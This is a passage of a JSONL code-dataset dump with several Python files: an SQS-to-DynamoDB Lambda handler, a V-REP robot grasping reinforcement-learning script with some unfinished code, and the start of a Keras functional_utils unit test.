self.send_to_buffer)\n self.last_timer.start()","sub_path":"aetros/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"348125339","text":"from __future__ import print_function # Python 2/3 compatibility\nimport boto3\nimport json\nimport uuid\n\ndef lambda_handler(event, context):\n\n recordIds = []\n for record in event['Records']:\n recordId = str(uuid.uuid4())\n messageId = record['messageId']\n senderId = record['attributes']['SenderId']\n sentTimestamp = record['attributes']['SentTimestamp']\n body = record['body']\n\n if isinstance(body, str):\n body = json.loads(body)\n \n addlInfo = { '_status': 'New', \"_id\": recordId, '_messageid': messageId, '_senderId': senderId, '_sentTimestamp': sentTimestamp }\n body.update(addlInfo)\n \n db = boto3.resource('dynamodb', region_name='us-east-1')\n table = db.Table('Syntinel')\n \n table.put_item(Item=body)\n recordIds.append(recordId)\n \n response = {\n \"statusCode\": 200,\n \"messageId\": messageId,\n \"processed\": len(event['Records']),\n \"recordIds\": recordIds\n }\n \n return response","sub_path":"scripts/POC/01 - SQS to Dynamo.py","file_name":"01 - SQS to Dynamo.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"630012535","text":"#!/usr/bin/env python3\n\n# Built-in lib imports\nimport time, random, struct, pickle\n\n# Standard Library imports\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n# Third-Party imports\nimport b0RemoteApi\nimport torch.nn as nn\nimport torch\nimport torch.optim as optim\nfrom scipy import ndimage\nimport torch\nfrom torch.autograd import Variable\nimport cv2\nimport os\n\n\nimport skimage.transform as trans\n# from utils_warp import convert_image_np, normalize_transforms, rotatepoints, show_image\nfrom utils import get_heightmap, get_input_tensors, get_prepared_img, \\\n transform_position_cam_to_global, euler2rotm, isRotm, depth_img_from_bytes, \\\n rgb_img_from_bytes\n\n\nfrom model import reinforcement_net\nimport logger\n\n\n\nwith b0RemoteApi.RemoteApiClient('b0RemoteApi_V-REP','b0RemoteApi', timeout=5) as client:\n\n # Make sure simulation is not running\n client.simxStopSimulation(client.simxDefaultPublisher())\n\n # Global variables\n doNextStep = True\n rgb_vision_msg = None\n d_vision_msg = None\n\n\n ##########################\n # Callbacks\n\n # Callbacks\n def simulationStepStarted(msg):\n # simTime=msg[1][b'simulationTime'];\n # print('Simulation step started. Simulation time: ',simTime)\n pass\n\n def simulationStepDone(msg):\n global doNextStep\n doNextStep = True\n\n #######################\n\n\n ##########################\n # Robot Class\n\n class Robot():\n def __init__(self, USE_CUDA=False):\n # Create object handles\n _, self.target_right_handle = client.simxGetObjectHandle(\"UR5_target\", client.simxServiceCall())\n _, self.connector_handle = client.simxGetObjectHandle('RG2_attachPoint', client.simxServiceCall())\n _, self.sensor_handle = client.simxGetObjectHandle('RG2_attachProxSensor', client.simxServiceCall())\n _, self.gripper_joint_handle = client.simxGetObjectHandle('RG2_openCloseJoint', client.simxServiceCall())\n _, self.cube_handle = client.simxGetObjectHandle(\"cube\", client.simxServiceCall())\n _, self.right_force_sensor_handle = client.simxGetObjectHandle(\"RG2_rightForceSensor\", client.simxServiceCall())\n _, self.vision_sensor_handle = client.simxGetObjectHandle('vision_sensor', client.simxServiceCall())\n _, self.side_vision_sensor_handle = client.simxGetObjectHandle('side_vision_sensor', client.simxServiceCall())\n\n # Parameters\n self.use_cuda = USE_CUDA\n self.explore_prob = 0.5\n self.learning_rate = 1e-4\n self.future_reward_discount = 0.5\n self.explore_rate_decay = True\n self.experience_replay = True\n self.label_value_log = []\n self.reward_value_log = []\n self.predicted_value_log = []\n self.executed_action_log = []\n\n # Initialize Huber loss\n self.criterion = torch.nn.SmoothL1Loss(reduce=False) # Huber loss\n if self.use_cuda:\n self.criterion = self.criterion.cuda() \n\n # Q-Network\n self.model = reinforcement_net(use_cuda=self.use_cuda)\n if self.use_cuda:\n self.model = self.model.cuda()\n\n # Initialize optimizer\n self.optimizer = torch.optim.SGD(self.model.parameters(), lr=self.learning_rate, momentum=0.9, weight_decay=2e-5)\n\n self.logger = logger.Logger(False, './logs')\n\n # not sure about the values\n # self.workspace_limits = np.asarray([[-0.75, -0.25], [-0.25, 0.25], [0.0001, 0.4]])\n self.workspace_limits = np.asarray([[-0.7, -0.3], [-0.2, 0.2], [0.0001, 0.4]])\n self.heightmap_resolution = 0.002 # No idea # HHHHHHHHHHHHHERRRRRRRRRREEEEEEEEEEEEEEE\n\n # Initiate simulation options\n client.simxSynchronous(False)\n client.simxGetSimulationStepStarted(client.simxDefaultSubscriber(simulationStepStarted));\n client.simxGetSimulationStepDone(client.simxDefaultSubscriber(simulationStepDone))\n client.simxStartSimulation(client.simxDefaultPublisher())\n\n client.simxAddStatusbarMessage(\"Starting!!!\", client.simxDefaultPublisher())\n print('Started Simulation!')\n\n\n self.setup_sim_camera()\n\n\n def setup_sim_camera(self):\n\n # Get handle to camera\n sim_ret, self.cam_handle = client.simxGetObjectHandle('vision_sensor', client.simxServiceCall())\n\n # Get camera pose and intrinsics in simulation\n sim_ret, cam_position = client.simxGetObjectPosition(self.cam_handle, -1, client.simxServiceCall())\n sim_ret, cam_orientation = client.simxGetObjectOrientation(self.cam_handle, -1, client.simxServiceCall())\n cam_trans = np.eye(4,4)\n cam_trans[0:3,3] = np.asarray(cam_position)\n cam_orientation = [-cam_orientation[0], -cam_orientation[1], -cam_orientation[2]]\n cam_rotm = np.eye(4,4)\n cam_rotm[0:3,0:3] = np.linalg.inv(euler2rotm(cam_orientation))\n self.cam_pose = np.dot(cam_trans, cam_rotm) # Compute rigid transformation representating camera pose\n self.cam_intrinsics = np.asarray([[618.62, 0, 320], [0, 618.62, 240], [0, 0, 1]])\n self.cam_depth_scale = 1\n\n # Get background image\n self.bg_color_img, self.bg_depth_img = self.get_camera_data()\n self.bg_depth_img = self.bg_depth_img * self.cam_depth_scale\n\n\n # Open Gripper\n def open_gripper(self):\n motor_velocity = 0.5 # m/s\n motor_force = 100 # N\n client.simxSetJointForce(self.gripper_joint_handle, motor_force, client.simxServiceCall())\n client.simxSetJointTargetVelocity(self.gripper_joint_handle, motor_velocity, client.simxServiceCall())\n gripper_position = client.simxGetJointPosition(self.gripper_joint_handle, client.simxServiceCall())\n while gripper_position[1] < 0:\n\n gripper_position = client.simxGetJointPosition(self.gripper_joint_handle, client.simxServiceCall())\n\n # client.simxSynchronousTrigger()\n # client.simxSpinOnce()\n\n # Close Gripper\n def close_gripper(self):\n motor_velocity = -0.5 # m/s\n motor_force = 100 # N\n client.simxSetJointForce(self.gripper_joint_handle, motor_force, client.simxServiceCall())\n client.simxSetJointTargetVelocity(self.gripper_joint_handle, motor_velocity, client.simxServiceCall())\n _, gripper_position = client.simxGetJointPosition(self.gripper_joint_handle, client.simxServiceCall())\n right_force_sensor_feedback= client.simxReadForceSensor(self.right_force_sensor_handle, client.simxServiceCall())\n gripper_fully_closed = False\n while gripper_position > -0.046:# and right_force_sensor_feedback[2][2] > -80:\n _, new_gripper_joint_position = client.simxGetJointPosition(self.gripper_joint_handle, client.simxServiceCall())\n # right_force_sensor_feedback = client.simxReadForceSensor(self.right_force_sensor_handle, client.simxServiceCall())\n if new_gripper_joint_position >= gripper_position:\n return gripper_fully_closed\n gripper_position = new_gripper_joint_position\n\n gripper_fully_closed = True\n\n return gripper_fully_closed\n\n\n def move_to_rand(self):\n random_position = [np.random.randint(limits[0], limits[1]) for limits in self.workspace_limits]\n random_position = [+.5163e-01, +4.4720e-01, +3.8412e-01] # transform_position_cam_to_global(random_position)\n WORLD_FRAME = -1 # vision_sensor_handle\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n move_direction = np.asarray([random_position[0] - current_position[0], random_position[1] - current_position[1], random_position[2] - current_position[2]])\n move_magnitude = np.linalg.norm(move_direction)\n step = 0.02*(move_direction/move_magnitude) # 0.02\n num_move_steps = int(np.floor(move_magnitude/0.02))\n\n for i_step in range(num_move_steps):\n next_position = [current_position[0] + step[0], current_position[1] + step[1], current_position[2] + step[2]]\n client.simxSetObjectPosition(self.target_right_handle, WORLD_FRAME, next_position, client.simxServiceCall())\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n # client.simxSynchronousTrigger()\n # client.simxSpinOnce()\n\n # next_position = [current_position[0] + step[0], current_position[1] + step[1], current_position[2] + step[2]]\n # client.simxSetObjectPosition(target_right_handle, WORLD_FRAME, next_position, client.simxServiceCall())\n\n\n def move_to(self, target):\n random_position = target # transform_position_cam_to_global(random_position)\n WORLD_FRAME = 20 # -1 # vision_sensor_handle\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n WORLD_FRAME = -1# self.vision_sensor_handle\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n \n move_direction = np.asarray([random_position[0] - current_position[0], random_position[1] - current_position[1], random_position[2] - current_position[2]])\n move_magnitude = np.linalg.norm(move_direction)\n step = 0.02*(move_direction/move_magnitude) # 0.02\n num_move_steps = int(np.floor(move_magnitude/0.02))\n\n for i_step in range(num_move_steps):\n next_position = [current_position[0] + step[0], current_position[1] + step[1], current_position[2] + step[2]]\n client.simxSetObjectPosition(self.target_right_handle, WORLD_FRAME, next_position, client.simxServiceCall())\n _, current_position = client.simxGetObjectPosition(self.target_right_handle, WORLD_FRAME, client.simxServiceCall())\n # client.simxSynchronousTrigger()\n # client.simxSpinOnce()\n\n # next_position = [current_position[0] + step[0], current_position[1] + step[1], current_position[2] + step[2]]\n # client.simxSetObjectPosition(target_right_handle, WORLD_FRAME, next_position, client.simxServiceCall())\n\n\n\n def get_camera_data(self):\n\n start_time = time.time()\n rgb_ret, rgb_res, rgb_img_raw = client.simxGetVisionSensorImage(self.vision_sensor_handle, False, client.simxServiceCall())\n end_time = time.time()\n # print('Elapsed rgb capture: {}'.format(end_time-start_time))\n\n start_time = time.time()\n d_ret, d_res, d_img_raw = client.simxGetVisionSensorDepthBuffer(self.vision_sensor_handle, False, True, client.simxServiceCall())\n end_time = time.time()\n # print('Elapsed depth capture: {}'.format(end_time-start_time))\n\n assert (d_ret and rgb_ret) == True\n\n client.simxSetVisionSensorImage(self.side_vision_sensor_handle, False, rgb_img_raw, client.simxDefaultPublisher())\n \n depth_img = depth_img_from_bytes(d_img_raw, rgb_res)\n # np.save('depth_img', depth_img)\n\n color_img = rgb_img_from_bytes(rgb_img_raw, rgb_res)\n # np.save('color_img', color_img)\n\n return color_img, depth_img\n\n def get_input_color_and_depth_data(self):\n color_img, depth_img = self.get_camera_data()\n color_img = get_prepared_img(color_img, 'rgb')\n depth_img = get_prepared_img(depth_img, 'depth')\n color_heightmap, depth_heightmap = get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, robot.workspace_limits, robot.heightmap_resolution)\n valid_depth_heightmap = depth_heightmap.copy()\n valid_depth_heightmap[np.isnan(valid_depth_heightmap)] = 0\n input_color_data, input_depth_data = get_input_tensors(color_heightmap, valid_depth_heightmap)\n\n return input_color_data, input_depth_data\n\n\n\n def reset_cube(self):\n relObjHandle = -1\n position = [-5.1500e-01, -1.5000e-02, +1.5000e-02]\n orientation = [0, 0, 0]\n ret_pos = client.simxSetObjectPosition(self.cube_handle, relObjHandle, position, client.simxServiceCall())\n ret_orient = client.simxSetObjectOrientation(self.cube_handle, relObjHandle, orientation, client.simxServiceCall())\n if not (ret_pos and ret_orient):\n print('Failed to set cube back to position')\n exit\n\n\n def grasp(self, position, best_rotation_angle):\n\n # Initialize variables that influence reward\n grasp_success = False\n change_detected = False\n\n # Compute tool orientation from heightmap rotation angle\n tool_rotation_angle = (best_rotation_angle % np.pi) - np.pi/2\n\n # Avoid collision with floor\n position = np.asarray(position).copy()\n position[2] = max(position[2] - 0.04, self.workspace_limits[2][0] + 0.02)\n\n # Move gripper to location above grasp target\n grasp_location_margin = 0.15\n # sim_ret, UR5_target_handle = vrep.simxGetObjectHandle(self.sim_client,'UR5_target',vrep.simx_opmode_blocking)\n location_above_grasp_target = (position[0], position[1], position[2] + grasp_location_margin)\n\n # Compute gripper position and linear movement increments\n tool_position = location_above_grasp_target\n self.move_to(tool_position)\n\n # Ensure gripper is open\n self.open_gripper()\n\n # Approach grasp target\n self.move_to(position)\n\n # Close gripper to grasp target\n gripper_full_closed = self.close_gripper()\n\n # Move gripper to location above grasp target\n self.move_to(location_above_grasp_target)\n\n # Check if grasp is successful\n gripper_full_closed = self.close_gripper()\n grasp_success = not gripper_full_closed\n\n print('Grasp success: {}'.format(grasp_success))\n\n return grasp_success\n\n\n def trainer_forward(self, color_heightmap, depth_heightmap, is_volatile=False, specific_rotation=-1):\n # Apply 2x scale to input heightmaps\n color_heightmap_2x = ndimage.zoom(color_heightmap, zoom=[2,2,1], order=0)\n depth_heightmap_2x = ndimage.zoom(depth_heightmap, zoom=[2,2], order=0)\n assert(color_heightmap_2x.shape[0:2] == depth_heightmap_2x.shape[0:2])\n\n # Add extra padding (to handle rotations inside network)\n diag_length = float(color_heightmap_2x.shape[0]) * np.sqrt(2)\n diag_length = np.ceil(diag_length/32)*32\n padding_width = int((diag_length - color_heightmap_2x.shape[0])/2)\n color_heightmap_2x_r = np.pad(color_heightmap_2x[:,:,0], padding_width, 'constant', constant_values=0)\n color_heightmap_2x_r.shape = (color_heightmap_2x_r.shape[0], color_heightmap_2x_r.shape[1], 1)\n color_heightmap_2x_g = np.pad(color_heightmap_2x[:,:,1], padding_width, 'constant', constant_values=0)\n color_heightmap_2x_g.shape = (color_heightmap_2x_g.shape[0], color_heightmap_2x_g.shape[1], 1)\n color_heightmap_2x_b = np.pad(color_heightmap_2x[:,:,2], padding_width, 'constant', constant_values=0)\n color_heightmap_2x_b.shape = (color_heightmap_2x_b.shape[0], color_heightmap_2x_b.shape[1], 1)\n color_heightmap_2x = np.concatenate((color_heightmap_2x_r, color_heightmap_2x_g, color_heightmap_2x_b), axis=2)\n depth_heightmap_2x = np.pad(depth_heightmap_2x, padding_width, 'constant', constant_values=0)\n\n # Pre-process color image (scale and normalize)\n image_mean = [0.485, 0.456, 0.406]\n image_std = [0.229, 0.224, 0.225]\n input_color_image = color_heightmap_2x.astype(float)/255\n for c in range(3):\n input_color_image[:,:,c] = (input_color_image[:,:,c] - image_mean[c])/image_std[c]\n\n # Pre-process depth image (normalize)\n image_mean = [0.01, 0.01, 0.01]\n image_std = [0.03, 0.03, 0.03]\n depth_heightmap_2x.shape = (depth_heightmap_2x.shape[0], depth_heightmap_2x.shape[1], 1)\n input_depth_image = np.concatenate((depth_heightmap_2x, depth_heightmap_2x, depth_heightmap_2x), axis=2)\n for c in range(3):\n input_depth_image[:,:,c] = (input_depth_image[:,:,c] - image_mean[c])/image_std[c]\n\n # Construct minibatch of size 1 (b,c,h,w)\n input_color_image.shape = (input_color_image.shape[0], input_color_image.shape[1], input_color_image.shape[2], 1)\n input_depth_image.shape = (input_depth_image.shape[0], input_depth_image.shape[1], input_depth_image.shape[2], 1)\n input_color_data = torch.from_numpy(input_color_image.astype(np.float32)).permute(3,2,0,1)\n input_depth_data = torch.from_numpy(input_depth_image.astype(np.float32)).permute(3,2,0,1)\n\n # Pass input data through model\n output_prob, state_feat = self.model.forward(input_color_data, input_depth_data, is_volatile=is_volatile) # is_volatile, specific_rotation)\n\n # Return Q values (and remove extra padding)\n for rotate_idx in range(len(output_prob)):\n if rotate_idx == 0:\n grasp_predictions = output_prob[rotate_idx][0].cpu().data.numpy()[:,0,int(padding_width/2):int(color_heightmap_2x.shape[0]/2 - padding_width/2),int(padding_width/2):int(color_heightmap_2x.shape[0]/2 - padding_width/2)]\n else:\n grasp_predictions = np.concatenate((grasp_predictions, output_prob[rotate_idx][0].cpu().data.numpy()[:,0,int(padding_width/2):int(color_heightmap_2x.shape[0]/2 - padding_width/2),int(padding_width/2):int(color_heightmap_2x.shape[0]/2 - padding_width/2)]), axis=0) \n\n return grasp_predictions, state_feat\n\n # Compute labels and backpropagate\n def backprop(self, color_heightmap, depth_heightmap, primitive_action, best_pix_ind, label_value): \n\n output_prob_dim = 288\n heightmap_dim = 200\n starting_pixel = int((output_prob_dim - heightmap_dim) / 2)\n\n # Compute labels\n label = np.zeros((1,output_prob_dim,output_prob_dim))\n action_area = np.zeros((heightmap_dim,heightmap_dim)) # np.zeros((224,224))\n action_area[best_pix_ind[1]][best_pix_ind[2]] = 1\n # blur_kernel = np.ones((5,5),np.float32)/25\n # action_area = cv2.filter2D(action_area, -1, blur_kernel)\n tmp_label = np.zeros((heightmap_dim,heightmap_dim))\n tmp_label[action_area > 0] = label_value\n label[0,starting_pixel:(output_prob_dim-starting_pixel),starting_pixel:(output_prob_dim-starting_pixel)] = tmp_label\n\n # Compute label mask\n label_weights = np.zeros(label.shape)\n tmp_label_weights = np.zeros((heightmap_dim,heightmap_dim))\n tmp_label_weights[action_area > 0] = 1\n label_weights[0,starting_pixel:(output_prob_dim-starting_pixel),starting_pixel:(output_prob_dim-starting_pixel)] = tmp_label_weights\n\n # Compute loss and backward pass\n self.optimizer.zero_grad()\n loss_value = 0\n\n # Do forward pass with specified rotation (to save gradients)\n grasp_predictions, state_feat = self.trainer_forward(color_heightmap, depth_heightmap, is_volatile=False, specific_rotation=best_pix_ind[0])\n\n if self.use_cuda:\n loss = self.criterion(self.model.output_prob[0][0].view(1,output_prob_dim,output_prob_dim), Variable(torch.from_numpy(label).float().cuda())) * Variable(torch.from_numpy(label_weights).float().cuda(),requires_grad=False)\n else:\n loss = self.criterion(self.model.output_prob[0][0].view(1,output_prob_dim,output_prob_dim), Variable(torch.from_numpy(label).float())) * Variable(torch.from_numpy(label_weights).float(),requires_grad=False)\n loss = loss.sum()\n loss.backward()\n loss_value = loss.cpu().data.numpy()\n\n opposite_rotate_idx = (best_pix_ind[0] + self.model.num_rotations/2) % self.model.num_rotations\n\n grasp_predictions, state_feat = self.trainer_forward(color_heightmap, depth_heightmap, is_volatile=False, specific_rotation=opposite_rotate_idx)\n\n if self.use_cuda:\n loss = self.criterion(self.model.output_prob[0][0].view(1,output_prob_dim,output_prob_dim), Variable(torch.from_numpy(label).float().cuda())) * Variable(torch.from_numpy(label_weights).float().cuda(),requires_grad=False)\n else:\n loss = self.criterion(self.model.output_prob[0][0].view(1,output_prob_dim,output_prob_dim), Variable(torch.from_numpy(label).float())) * Variable(torch.from_numpy(label_weights).float(),requires_grad=False)\n\n loss = loss.sum() \n loss.backward()\n loss_value = loss.cpu().data.numpy()\n\n loss_value = loss_value/2\n\n print('Training loss: %f' % (loss_value))\n self.optimizer.step()\n\n\n def get_label_value(self, primitive_action, grasp_success, change_detected, prev_grasp_predictions, next_color_heightmap, next_depth_heightmap):\n\n # Compute current reward\n current_reward = 0\n if grasp_success:\n current_reward = 1.0\n elif change_detected:\n current_reward = 0.5\n\n # Compute future reward\n if not change_detected and not grasp_success:\n future_reward = 0\n else:\n next_grasp_predictions, next_state_feat = self.trainer_forward(next_color_heightmap, next_depth_heightmap, is_volatile=True)\n future_reward = np.max(next_grasp_predictions)\n\n # # Experiment: use Q differences\n # push_predictions_difference = next_push_predictions - prev_push_predictions\n # grasp_predictions_difference = next_grasp_predictions - prev_grasp_predictions\n # future_reward = max(np.max(push_predictions_difference), np.max(grasp_predictions_difference))\n\n print('Current reward: %f' % (current_reward))\n print('Future reward: %f' % (future_reward))\n expected_reward = current_reward + self.future_reward_discount * future_reward\n print('Expected reward: %f + %f x %f = %f' % (current_reward, self.future_reward_discount, future_reward, expected_reward))\n \n return expected_reward, current_reward\n\n\n\n\n def get_action(self, iteration):\n\n self.execute_action = True\n\n for i in range(2):\n color_img, depth_img = self.get_camera_data()\n color_img = get_prepared_img(color_img, 'rgb')\n depth_img = get_prepared_img(depth_img, 'depth')\n color_heightmap, depth_heightmap = get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, robot.workspace_limits, robot.heightmap_resolution)\n valid_depth_heightmap = depth_heightmap.copy()\n valid_depth_heightmap[np.isnan(valid_depth_heightmap)] = 0\n\n # Save RGB-D images and RGB-D heightmaps # trainer.iteration\n self.logger.save_images(1, color_img, depth_img, '0') # trainer.iteration\n self.logger.save_heightmaps(1, color_heightmap, valid_depth_heightmap, '0') # trainer.iteration\n\n\n grasp_predictions, state_feat = self.trainer_forward(color_heightmap, valid_depth_heightmap, is_volatile=True)\n\n\n ############################################ EXECUTING THREAD ############################################\n ############################################ EXECUTING THREAD ############################################\n ############################################ EXECUTING THREAD ############################################\n\n if self.execute_action:\n\n explore_actions = np.random.uniform() < self.explore_prob\n if explore_actions: # Exploitation (do best action) vs exploration (do other action)\n print('Strategy: explore (exploration probability: %f)' % (self.explore_prob))\n # nonlocal_variables['primitive_action'] = 'push' if np.random.randint(0,2) == 0 else 'grasp'\n else:\n print('Strategy: exploit (exploration probability: %f)' % (self.explore_prob))\n\n print('grasp_predictions.shape: {}'.format(grasp_predictions.shape))\n # Get pixel location and rotation with highest affordance prediction from heuristic algorithms (rotation, y, x)\n best_pix_ind = np.unravel_index(np.argmax(grasp_predictions), grasp_predictions.shape)\n predicted_value = np.max(grasp_predictions)\n\n # Save predicted confidence value\n self.predicted_value_log.append([predicted_value])\n self.logger.write_to_log('predicted-value', self.predicted_value_log)\n \n print('best_pix_ind[0]: {}, best_pix_ind[1]: {}, best_pix_ind[2]: {}'.format(best_pix_ind[0], best_pix_ind[1], best_pix_ind[2]))\n\n # Compute 3D position of pixel\n print('Action: %s at (%d, %d, %d)' % ('Grasp', best_pix_ind[0], best_pix_ind[1], best_pix_ind[2]))\n best_rotation_angle = np.deg2rad(best_pix_ind[0]*(360.0/robot.model.num_rotations))\n best_pix_x = best_pix_ind[2] # 118\n best_pix_y = best_pix_ind[1] # 115\n primitive_position = [best_pix_x * self.heightmap_resolution + self.workspace_limits[0][0], best_pix_y * self.heightmap_resolution + self.workspace_limits[1][0], valid_depth_heightmap[best_pix_y][best_pix_x] + self.workspace_limits[2][0]]\n position = primitive_position\n\n # Save executed primitive\n self.executed_action_log.append([1, best_pix_ind[0], best_pix_ind[1], best_pix_ind[2]]) # 1 - grasp\n self.logger.write_to_log('executed-action', self.executed_action_log)\n\n\n # Execute Primitive\n grasp_success = self.grasp(position, best_rotation_angle)\n\n self.execute_action = False\n\n\n ########################## TRAINING ##########################\n ########################## TRAINING ##########################\n ########################## TRAINING ##########################\n\n # Run training iteration in current thread (aka training thread)\n if 'prev_color_img' in locals():\n\n # Detect changes\n depth_diff = abs(depth_heightmap - prev_depth_heightmap)\n depth_diff[np.isnan(depth_diff)] = 0\n depth_diff[depth_diff > 0.3] = 0\n depth_diff[depth_diff < 0.01] = 0\n depth_diff[depth_diff > 0] = 1\n change_threshold = 300\n change_value = np.sum(depth_diff)\n change_detected = change_value > change_threshold or prev_grasp_success\n print('Change detected: %r (value: %d)' % (change_detected, change_value))\n\n # if change_detected:\n # if prev_primitive_action == 'push':\n # no_change_count[0] = 0\n # elif prev_primitive_action == 'grasp':\n # no_change_count[1] = 0\n # else:\n # if prev_primitive_action == 'push':\n # no_change_count[0] += 1\n # elif prev_primitive_action == 'grasp':\n # no_change_count[1] += 1\n\n # Compute training labels\n label_value, prev_reward_value = self.get_label_value(prev_primitive_action, \n prev_grasp_success, \n change_detected, \n prev_grasp_predictions, \n color_heightmap, # Fix get_label since it's using the local_network call, instead of the trainer call like in the original code, which goes through the preprocessing step.\n valid_depth_heightmap)\n \n self.label_value_log.append([label_value])\n self.logger.write_to_log('label-value', self.label_value_log)\n self.reward_value_log.append([prev_reward_value])\n self.logger.write_to_log('reward-value', self.reward_value_log)\n\n # Backpropagate\n self.backprop(prev_color_heightmap, prev_valid_depth_heightmap, prev_primitive_action, prev_best_pix_ind, label_value)\n\n self.explore_prob = max(0.5 * np.power(0.9998, iteration),0.1) if self.explore_rate_decay else 0.5\n\n\n # Do sampling for experience replay\n if self.experience_replay:\n sample_primitive_action = prev_primitive_action\n sample_primitive_action_id = 1\n sample_reward_value = 0 if prev_reward_value == 1.0 else 1.0\n\n # Get samples of the same primitive but with different results\n # Indices where the primitive is the prev_prev, and also have different results. This has the same shape as trainer.reward_value_log as well as trainer.executed_action_log.\n # argwhere returns the indices of the True booleans from the preceding operation.\n sample_ind = np.argwhere(np.logical_and(np.asarray(self.reward_value_log)[1:iteration,0] == sample_reward_value, np.asarray(self.executed_action_log)[1:iteration,0] == sample_primitive_action_id))\n\n\n print('sample_reward_value: {}'.format(sample_reward_value))\n print()\n print('self.reward_value_log: {}'.format(self.reward_value_log))\n print()\n print('self.executed_action_log: {}'.format(self.executed_action_log))\n\n if sample_ind.size > 0:\n # Find sample with highest surprise value\n sample_surprise_values = np.abs(np.asarray(self.predicted_value_log)[sample_ind[:,0]] - np.asarray(self.label_value_log)[sample_ind[:,0]])\n sorted_surprise_ind = np.argsort(sample_surprise_values[:,0])\n sorted_sample_ind = sample_ind[sorted_surprise_ind,0]\n pow_law_exp = 2\n rand_sample_ind = int(np.round(np.random.power(pow_law_exp, 1)*(sample_ind.size-1)))\n sample_iteration = sorted_sample_ind[rand_sample_ind]\n print('Experience replay: iteration %d (surprise value: %f)' % (sample_iteration, sample_surprise_values[sorted_surprise_ind[rand_sample_ind]]))\n\n # Load sample RGB-D heightmap\n sample_color_heightmap = cv2.imread(os.path.join(self.logger.color_heightmaps_directory, '%06d.0.color.png' % (sample_iteration)))\n sample_color_heightmap = cv2.cvtColor(sample_color_heightmap, cv2.COLOR_BGR2RGB)\n sample_depth_heightmap = cv2.imread(os.path.join(self.logger.depth_heightmaps_directory, '%06d.0.depth.png' % (sample_iteration)), -1)\n sample_depth_heightmap = sample_depth_heightmap.astype(np.float32)/100000\n\n # Compute forward pass with sample\n with torch.no_grad():\n sample_grasp_predictions, sample_state_feat = trainer.forward(sample_color_heightmap, sample_depth_heightmap, is_volatile=True)\n\n # Load next sample RGB-D heightmap\n next_sample_color_heightmap = cv2.imread(os.path.join(self.logger.color_heightmaps_directory, '%06d.0.color.png' % (sample_iteration+1)))\n next_sample_color_heightmap = cv2.cvtColor(next_sample_color_heightmap, cv2.COLOR_BGR2RGB)\n next_sample_depth_heightmap = cv2.imread(os.path.join(self.logger.depth_heightmaps_directory, '%06d.0.depth.png' % (sample_iteration+1)), -1)\n next_sample_depth_heightmap = next_sample_depth_heightmap.astype(np.float32)/100000\n\n sample_grasp_success = sample_reward_value == 1\n sample_change_detected = sample_push_success\n # new_sample_label_value, _ = trainer.get_label_value(sample_primitive_action, sample_push_success, sample_grasp_success, sample_change_detected, sample_push_predictions, sample_grasp_predictions, next_sample_color_heightmap, next_sample_depth_heightmap)\n\n # Get labels for sample and backpropagate\n sample_best_pix_ind = (np.asarray(self.executed_action_log)[sample_iteration,1:4]).astype(int)\n self.backprop(sample_color_heightmap, sample_depth_heightmap, sample_primitive_action, sample_best_pix_ind, self.label_value_log[sample_iteration])\n\n # Recompute prediction value and label for replay buffer\n self.predicted_value_log[sample_iteration] = [np.max(sample_grasp_predictions)]\n # trainer.label_value_log[sample_iteration] = [new_sample_label_value]\n\n else:\n print('Not enough prior training samples. Skipping experience replay.')\n\n\n \n self.reset_cube()\n\n\n\n\n # Save information for next training step\n prev_color_img = color_img.copy()\n prev_depth_img = depth_img.copy()\n prev_color_heightmap = color_heightmap.copy()\n prev_depth_heightmap = depth_heightmap.copy()\n prev_valid_depth_heightmap = valid_depth_heightmap.copy()\n prev_grasp_predictions = grasp_predictions.copy()\n prev_grasp_success = grasp_success\n prev_primitive_action = 'grasp'\n prev_best_pix_ind = best_pix_ind\n\n\n######################################################################################################\n######################################################################################################\n######################################## Main ########################################################\n######################################################################################################\n######################################################################################################\n\n robot = Robot(USE_CUDA=True)\n for iter in range(1, 101):\n robot.get_action(iter)\n\n # Stop simulation\n print('Stopping Simulation...')\n client.simxStopSimulation(client.simxServiceCall())\n print('Simulation Over.')\n\n\n \n\n # NUM_EPISODES = 1000\n\n # for i_episode in range(1, NUM_EPISODES+1):\n \n\n\n","sub_path":"back_up_robot_single.py","file_name":"back_up_robot_single.py","file_ext":"py","file_size_in_byte":36306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"87175783","text":"# Copyright 2021 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#,============================================================================\n\"\"\"Tests for functional_utils.\"\"\"\n\nfrom keras import keras_parameterized\nfrom keras import layers\nfrom keras import models\nfrom keras.engine import functional_utils\nfrom keras.engine import input_layer as input_layer_lib\n\nimport numpy as np\nimport tensorflow.compat.v2 as tf\n\n\nclass FunctionalModelSlideTest(keras_parameterized.TestCase):\n\n def testfind_nodes_by_inputs_and_outputs(self):\n inputs = input_layer_lib.Input((10,))\n unconnected_inputs = input_layer_lib.Input((10,))\n x = layers.Dense(8)(inputs)\n y = layers.Dense(6)(x)\n output = layers.Dense(4)(y)\n\n nodes_in_graph = functional_utils.find_nodes_by_inputs_and_outputs(\n x, output)\n self.assertLen(nodes_in_graph, 2)\n expected_nodes = [output.node, y.node]\n self.assertCountEqual(nodes_in_graph, expected_nodes)\n\n # Make sure we raise error if we specify invalid input/output pair\n with self.assertRaisesRegex(\n ValueError, 'Found input tensor cannot be reached'):\n 